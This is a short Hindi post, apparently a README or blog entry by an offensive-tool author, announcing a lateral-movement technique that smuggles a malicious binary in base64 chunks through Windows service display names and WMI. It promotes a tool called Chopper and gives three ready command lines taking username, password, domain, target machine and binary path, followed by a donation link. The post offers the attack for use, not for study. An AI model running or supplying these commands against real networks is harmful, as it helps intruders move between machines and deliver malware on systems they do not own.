
अनफ़िल्टर्ड सेवाओं के डिस्प्ले नाम का लाभ उठाकर बाइनरीज़ को टुकड़ों के रूप में लक्ष्य मशीन में तस्करी करने के लिए लेटरल मूवमेंट हमला करना
हाल ही में मैंने एक नई तकनीक खोजी है और इसे एक उपनाम (चॉप चॉप) दिया है, जो विंडोज सेवाओं के डिस्प्ले नाम और WMI का उपयोग करके पार्श्व गति (lateral movement) करने के लिए है, दुर्भावनापूर्ण बाइनरी को base64 चंक्स के रूप में तस्करी करके और TChopper टूल का उपयोग करके प्रक्रिया को स्वचालित करता है।
image
जबकि यदि आप WMI तकनीक का उपयोग करके पार्श्व गति (lateral movement) कर रहे हैं, तो आप Chopper का उपयोग कर सकते हैं:
image
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
मैं ओपन-सोर्स समुदाय के लिए offsec टूल बनाता हूँ, अपना समर्थन दिखाएं https://paypal.me/0xsp